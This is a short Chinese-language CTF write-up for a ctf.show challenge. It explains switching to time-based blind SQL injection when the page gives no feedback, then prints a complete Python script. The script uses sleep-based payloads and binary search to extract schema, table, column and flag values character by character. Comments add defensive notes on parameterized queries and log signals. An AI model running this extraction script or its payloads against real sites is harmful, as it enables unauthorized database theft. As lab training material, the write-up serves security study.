无论输入什么,返回结果都一样,没有可供判断的回显,因此尝试延时注入(基于时间的盲注)。
可以看到延时注入成功,接下来用脚本逐个字符跑出数据:
import requests
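if __name__ == '__main__':
    # Time-based blind SQL injection solver for the CTF challenge instance below.
    # The page returns the same body for every input, so response latency is the
    # only observable signal: each payload asks the database to sleep when the
    # i-th character of the queried string has an ASCII code greater than `mid`.
    #
    # Defender's view: this works only because `id` is spliced into a quoted SQL
    # string (the URL closes the quote with %27 and comments out the rest with
    # %23). A parameterized query removes the injection point, and sleep()/if()
    # appearing in a query string is a useful signal in request logs.
    url = 'http://ab9de79e-73ed-4344-976d-122e8c49ff6c.challenge.ctf.show/?id=1%27and%20'
    result = ''
    i = 0
    while True:
        i = i + 1
        # Binary-search the printable ASCII range [32, 127) for character i.
        low = 32
        high = 127
        while low < high:
            mid = (low + high) // 2
            # Stage 1: schema names. The commented payloads are the later
            # stages (tables, columns, flag column), swapped in by hand.
            payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.2),0)%23'
            # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},sleep(0.2),0)%23'
            # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagug"),{i},1))>{mid},sleep(0.2),0)%23'
            #payload = f'if(ascii(substr((select group_concat(flag4a23) from ctfshow.flagug),{i},1))>{mid},sleep(0.2),0)%23'
            #print(payload)
            try:
                # One timed request per probe. The original also issued an
                # untimed request first, which doubled the traffic and could
                # hang indefinitely without contributing to the result.
                requests.get(url=url + payload, timeout=0.15)
                high = mid
            except requests.exceptions.Timeout:
                # Only a timeout means "condition true". A bare `except:` would
                # also count connection errors (and Ctrl-C) as a hit and
                # silently corrupt the output.
                # NOTE: ordinary network latency above 0.15 s is
                # indistinguishable from the 0.2 s sleep, so results on a slow
                # link are unreliable.
                low = mid + 1
        if low != 32:
            result += chr(low)
        else:
            # low never moved: no character code above 32 at this position,
            # i.e. the end of the string (a literal space stops the loop too).
            break
        print(result)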
跑出结果